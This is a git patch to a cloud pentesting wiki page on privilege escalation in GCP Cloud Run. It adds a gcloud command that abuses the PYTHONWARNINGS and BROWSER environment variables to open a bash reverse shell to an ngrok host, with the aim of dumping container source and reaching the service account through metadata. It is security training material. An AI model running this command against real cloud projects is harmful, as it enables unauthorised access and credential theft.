From cf10948ca59b5ef9b5c36ac9053e2490194cfe7f Mon Sep 17 00:00:00 2001 From: CPol Date: Wed, 19 Jun 2024 23:14:37 +0000 Subject: [PATCH] GITBOOK-629: No subject --- .../gcp-privilege-escalation/gcp-run-privesc.md | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md index 3c147ce5c0..4910b0b6a5 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md @@ -78,7 +78,17 @@ gcloud beta run jobs update hacked \ --execute-now ``` -### `run.jobs.setIamPolicy` +### run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get) + +Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata: + +{% code overflow="wrap" %} +```bash +gcloud beta run jobs execute job-name --region --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s" +``` +{% endcode %} + +### `çrun.jobs.setIamPolicy` Give yourself the previous permissions over Cloud Jobs.